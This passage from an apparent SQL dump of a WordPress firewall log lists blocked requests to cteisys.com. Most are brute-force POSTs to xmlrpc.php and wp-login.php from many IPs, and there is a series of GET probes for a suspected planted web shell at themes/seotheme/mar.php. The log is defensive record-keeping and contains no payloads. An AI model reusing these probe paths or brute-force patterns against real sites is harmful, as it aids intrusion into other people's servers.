Safari\\/537.36\"}','23bB5vcgnSuUDk7OCLdhyMY6',0,1664452997.8405,531,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','E91M2VJIvngD5LGfAhZCFla8',0,1664453011.3052,518,'','POST',403,0,515,0,1,'',0),('39.107.137.177',661359025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','R6Ob5mhlNaxdtFiC17vB4KqJ',0,1664453044.5585,1315,'','POST',403,0,515,0,1,'',0),('209.87.239.76',3512201036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','edqNgJ30IjMhiwKTQr5akFPz',0,1664453159.8888,1394,'','POST',403,0,515,0,1,'',0),('5.101.157.25',90545433,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jSWNBoZJvmD0HAEu6zdibs9U',0,1664453573.0208,1357,'','POST',403,0,515,0,1,'',0),('192.210.196.65',3235038273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NFWlfbLj248UmydKXItcMHBJ',0,1664453695.3382,1426,'','POST',403,0,515,0,1,'',0),('81.68.150.77',1363449421,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','W3VfRxute14CDgEIpk6s7HqA',0,1664454007.3189,1413,'','POST',403,0,515,0,1,'',0),('212.146.128.154',3566370970,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','IB9rakoSynleHAduVUPsqwR8',0,1664454013.6413,571,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','hs4NRizfAltZCP8cFETDg26m',0,1664454021.9485,539,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','wUi0TQbSEgu2nZDpfBW67OdC',0,1664454041.2388,504,'','POST',403,0,515,0,1,'',0),('168.138.1.42',2827616554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','OGzIL35SQRXBu29imhyorcwJ',0,1664454046.1546,1294,'','POST',403,0,515,0,1,'',0),('45.149.77.114',764759410,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Cprw0tTOKvGm1huf3g7jDAyb',0,1664454204.4702,4409,'','POST',403,0,515,0,1,'',0),('89.46.107.98',1496214370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','3y2YXJbRtv1eEQLMgNczDW07',0,1664454363.9271,1319,'','POST',403,0,515,0,1,'',0),('168.90.176.14',2824515598,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','FmxXB1JgevshKEPf97UuLn6S',0,1664454365.6364,482,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','DMNusyv78Thc34SmoJ5e2ROq',0,1664454366.8022,512,'','POST',403,0,515,0,1,'',0),('64.207.178.246',1087353590,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','4pEHnYOSo5UeNLfV7kr0zMxC',0,1664454367.5533,498,'','POST',403,0,515,0,1,'',0),('37.251.155.62',637246270,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','cTrljsA7RH3mFXEp4YvoIOyN',0,1664454371.4225,563,'','POST',403,0,515,0,1,'',0),('101.99.3.20',1700987668,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','5yUdj2C903H6Tz1YfFB8il4Q',0,1664454374.5247,527,'','POST',403,0,515,0,1,'',0),('103.117.212.32',1735775264,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','cwVjOpBiJ3zXUdSkTsuAH0Io',0,1664454377.3523,485,'','POST',403,0,515,0,1,'',0),('103.121.88.59',1736005691,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','UOEpzNu3tjC0nT1YQxhI8a6H',0,1664454383.4205,493,'','POST',403,0,515,0,1,'',0),('167.99.206.99',2808335971,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','YwmsacHQrBiWTFqCp6fz4ZxR',0,1664454384.2013,548,'','POST',403,0,515,0,1,'',0),('52.179.81.192',884167104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','iMfHQgDaWvPs5TrzKedn78yw',0,1664454387.1283,500,'','POST',403,0,515,0,1,'',0),('178.239.172.7',3002051591,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','gVbpGOljaikKI45W3PSQ1UHh',0,1664454390.0856,489,'','POST',403,0,515,0,1,'',0),('139.180.157.5',2343869701,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','N4LgbfY2MBlzEiaqVOKuZe3T',0,1664454747.5466,20065,'','POST',403,0,515,0,1,'',0),('88.135.37.49',1485251889,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BmF8jOrdnDwf2gpVRIyKtaYq',0,1664455510.0475,496,'','POST',403,0,600,0,1,'',0),('194.233.69.10',3270067466,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','D6siOTuMLh0rxGtFaNmb2nRS',0,1664455675.1817,451,'','POST',403,0,600,0,1,'',0),('111.90.150.36',1868207652,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qVTf5Xr3S6iWznEtwCLlQ0hx',0,1664456427.7184,517,'','POST',403,0,600,0,1,'',0),('111.90.150.28',1868207644,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','odlG4OUqBR5YPAyEr1JzVWib',0,1664456672.3048,546,'','POST',403,0,600,0,1,'',0),('104.254.90.203',1761499851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','R4iXkLfAGnMhzg1wVFSvorj6',0,1664457084.5341,2388,'','POST',403,0,515,0,1,'',0),('139.180.157.5',2343869701,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jLmrXbZi2qMuwCFTphVWUON9',0,1664457167.5345,1263,'','POST',403,0,515,0,1,'',0),('216.137.180.105',3632903273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DSJzdmPAjVp4I3WhbCgOB58L',0,1664457291.0758,1343,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','EBOaD09wlJSc4HqmXndVkUsW',0,1664457502.6910,1222,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','Mkj1KBmStcx3Hs26IaXOP8Ue',0,1664457508.6870,533,'','POST',403,0,515,0,1,'',0),('173.44.60.148',2905357460,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','qr3ThFZdHEgyxzPNoCD9jOk7',0,1664457512.2512,575,'','POST',403,0,515,0,1,'',0),('23.94.61.21',392051989,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','56NXz02nUbCcHltWaeVr4sPQ',0,1664457522.4302,469,'','POST',403,0,515,0,1,'',0),('142.93.36.53',2388468789,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','RPzHd62f7KVG4hp5SXLUTjI3',0,1664457539.1617,1287,'','POST',403,0,515,0,1,'',0),('61.19.125.142',1024687502,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','unWK79PHbV0qeY25TGzsaov6',0,1664457541.8734,578,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Kl0Qwnkc5CUrDORJ38tYMTPu',0,1664457698.3168,13830,'','POST',403,0,515,0,1,'',0),('51.79.144.41',860852265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c1PJifGzmTav9lCDrk6nFK2g',0,1664457848.1267,1320,'','POST',403,0,515,0,1,'',0),('20.109.17.221',342692317,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Tdl9DU4M3HhWLE8uIy2meQNf',0,1664458116.2362,12364,'','GET',403,0,700,0,1,'',0),('20.109.17.221',342692317,'','http://cteisys.com/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','oHiQVFdUgN7OBDsAraqLn8Kv',0,1664458132.5176,284,'','GET',403,0,700,0,1,'',0),('20.109.17.221',342692317,'','http://cteisys.com/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','U2OEPWFTyjuoRzV5bQfq6G8K',0,1664458136.2907,288,'','GET',403,0,700,0,1,'',0),('20.109.17.221',342692317,'','http://cteisys.com/blog/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','usUqw654vM98Hk2VbyLhElxN',0,1664458139.7484,281,'','GET',403,0,700,0,1,'',0),('20.109.17.221',342692317,'','http://cteisys.com/site/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','QdUEioVvSWLp0bmljAzOXqc2',0,1664458154.5922,346,'','GET',403,0,700,0,1,'',0),('148.72.214.59',2487801403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RmhX14SPIiK5wDg8ZzVkBJdl',0,1664458346.5719,10643,'','POST',403,0,515,0,1,'',0),('5.101.157.241',90545649,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','peXlR5G3KVEaqDA2LdvC6UnW',0,1664458499.5057,3640,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','p0niZNRxwmbPaLBW3XM9fcj4',0,1664459283.7933,14877,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','7Xqk8FJ5p6ZmhyfDQgHORINc',0,1664459281.2765,17416,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','JM1Of06A5zBmVo3eGbd8KkaS',0,1664459300.5767,511,'','POST',403,0,515,0,1,'',0),('162.0.220.27',2717965339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','JQFD4ncorepsMlPGOxAitb5y',0,1664459301.9684,522,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','cYH92lnxwMoLheUObGQm4qz1',0,1664459309.7598,2436,'','POST',403,0,515,0,1,'',0),('45.63.27.156',759110556,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','pdc0C2YABx6NnQKRIOh7wFml',0,1664459316.4019,487,'','POST',403,0,515,0,1,'',0),('101.99.3.20',1700987668,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ATUR2os6vzhBb7Syd50nJKCa',0,1664459322.0682,526,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','fBKla0nUhJjNyT9VDp1Q6P7E',0,1664459331.9059,1705,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','tQbYNG6kV5BTD3Pfavzn7ZuS',0,1664459332.9906,1329,'','POST',403,0,515,0,1,'',0),('3.111.174.159',57650847,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','tVmTjQxr4zGEb5CwOH308f2K',0,1664459340.2442,510,'','POST',403,0,515,0,1,'',0),('147.139.178.177',2475406001,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TFmBL8WsDKr1dPuZYGjiOz7J',0,1664460069.0576,19701,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','AH5uFjscSZ1hgWxq3fXmNMBa',0,1664460236.5181,3096,'','POST',403,0,515,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kpmv5B8oDRJOfzTMFqVUjesZ',0,1664460221.2023,18448,'','POST',403,0,515,0,1,'',0),('118.27.125.16',1981512976,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','GtavzFRfTDrh3d9nmKp4olSW',0,1664460240.3323,582,'','POST',403,0,515,0,1,'',0),('192.249.124.141',3237575821,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','pOU3YBzPi8xqWyowrA9gdlbs',0,1664460243.7770,543,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','VA7IEK5S92kbnRadl4vsLzMC',0,1664460246.3270,599,'','POST',403,0,515,0,1,'',0),('34.91.106.237',576416493,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','3xPv2fJNSa8UCLZtw4HlkmsR',0,1664460247.1284,549,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','ZFWsCfEk4UlnjXrbzu0O1QxD',0,1664460252.7965,574,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','IAVkSqlLZoiBEhngObewt31X',0,1664460260.9079,8729,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','CdjRxsIgr54EzaWGFKV7HN6Y',0,1664460260.9132,8725,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','iyK3r8Ou6x10dR9gIzoBATUn',0,1664460274.1614,3094,'','POST',403,0,515,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ZskMo3zpIFf7ShTDOaRxdjnE',0,1664460299.5373,18738,'','POST',403,0,515,0,1,'',0),('216.158.230.167',3634292391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rKVcCB0R9uFI3ODsmfPqSg21',0,1664460769.0435,18867,'','POST',403,0,515,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OobAImTVeHlUjGPNE3C9invh',0,1664461156.2960,18912,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v8VokQlL2SsjPwEmWGUh36Aa',0,1664461296.5104,19228,'','POST',403,0,515,0,1,'',0),('103.116.16.173',1735659693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GamubPNi6Uz7Z59rhMpdyQHE',0,1664461707.9933,18682,'','POST',403,0,515,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HNRKgZhPUYpT6XWw91m7iBa5',0,1664462280.3054,19104,'','POST',403,0,515,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sSW7qn1C6YbTAORdG2vweVy9',0,1664462834.8550,18463,'','POST',403,0,515,0,1,'',0),('47.111.84.214',795825366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vDuAhQJUof7Y0Tmk8tI15Lsb',0,1664463403.0329,18684,'','POST',403,0,515,0,1,'',0),('3.111.174.159',57650847,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','HmNIvY4QR1nLBOWGTJbCKwUf',0,1664463455.8160,657,'','POST',403,0,515,0,1,'',0),('82.165.86.39',1386567207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','uiQhdHqDKL9b7Vapg1XI25fM',0,1664463460.0051,495,'','POST',403,0,515,0,1,'',0),('204.93.193.216',3428696536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Kk6mX2YdbPUth7v1SCfqwnMJ',0,1664463464.2340,531,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','lru0oOZtVMCscmhd8z5aUKG1',0,1664463472.2970,1360,'','POST',403,0,515,0,1,'',0),('212.91.94.100',3562757732,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','AiCltVbB3Jy1Rfmn7ZUIgFk5',0,1664463477.9053,521,'','POST',403,0,515,0,1,'',0),('81.169.144.135',1370067079,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','s69UgnF5P8iK2kOjCEYoWGQv',0,1664463484.7940,1456,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','6RhYwCpJligGU8yNcXuELmPZ',0,1664463488.5767,575,'','POST',403,0,515,0,1,'',0),('43.239.110.241',737111793,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','Qv8JrTfFe1LZtzXjlNkD2Hn0',0,1664463494.2006,555,'','POST',403,0,515,0,1,'',0),('114.132.250.235',1921317611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6aC2hJNPGmf8uoxH0Wc7T3Sq',0,1664463515.7736,575,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z73IFeXj1Ry4gMCq8rn5uOPJ',0,1664463966.8259,20153,'','POST',403,0,515,0,1,'',0),('216.250.116.85',3640292437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yu5k36cH9aETXn08sxfMR14G',0,1664465092.8643,18622,'','POST',403,0,515,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CLaAWzoOsnkupFGbNUVDXj87',0,1664465232.1451,7207,'','POST',403,0,515,0,1,'',0),('178.128.2.114',2994733682,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile 